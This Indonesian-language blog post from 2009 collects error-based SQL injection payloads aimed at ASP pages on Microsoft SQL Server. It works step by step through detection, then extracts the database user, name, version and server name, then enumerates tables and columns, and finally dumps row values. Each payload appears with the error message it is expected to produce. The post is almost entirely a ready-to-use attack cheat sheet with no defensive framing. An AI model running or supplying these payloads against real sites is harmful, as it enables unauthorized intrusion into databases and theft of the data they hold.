Koleksi Script SQL

Koleksi Script SQL

7/31/2009 04:07:00 pm
Ada beberapa koleksi nih tentang SQL injection error.
seperti apa aja bentuk bugnya?

ERROR SQL INJECTION - DETECTION

Integer Injection:
http://[site]/page.asp?id=1 having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

String Injection:
http://[site]/page.asp?id=x' having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.


ERROR SQL INJECTION - EXTRACT DATABASE USER

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT DATABASE NAME

http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))--

Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT DATABASE VERSION

http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))--

Syntax error converting the nvarchar value '[DB VERSION]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT SERVER NAME

http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))--

Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--

Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))--

Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))--

Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--

Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--

Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--

Syntax error converting the nvarchar value '[COLUMN NAME 3]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--

Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))--

Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))--

Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--

Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND ROW]' to a column of data type int.


ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW

http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))--

Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD ROW]' to a column of data type int.


Share on Facebook
Share on Twitter
Share on Google+
Share on LinkedIn
Unknown

Next
« Prev Post
Previous
Next Post »
0 Komentar

Subscribe to: Post Comments (Atom)